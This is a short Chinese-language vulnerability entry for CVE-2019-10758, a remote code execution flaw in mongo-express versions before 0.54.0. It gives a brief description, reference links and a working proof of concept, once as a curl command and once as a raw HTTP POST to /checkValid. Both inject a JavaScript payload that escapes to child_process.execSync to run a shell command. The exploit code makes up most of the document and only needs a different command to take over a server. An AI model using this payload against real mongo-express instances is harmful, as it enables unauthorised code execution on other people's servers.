【初级】Mongo-express远程代码执行

CVE-2019-10758

漏洞描述：漏洞问题出在lib/bson.js中的toBSON()函数中，路由 /checkValid 从外部接收输入，并调用了存在 RCE 漏洞的代码，由此存在被攻击的风险。

影响版本：mongo-express < 0.54.0

参考资料：

• https://cloud.tencent.com/developer/article/1604522
• https://xz.aliyun.com/t/7066

POC：

curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw=='  --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")'

-------------------------------------------

POST /checkValid HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 124

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")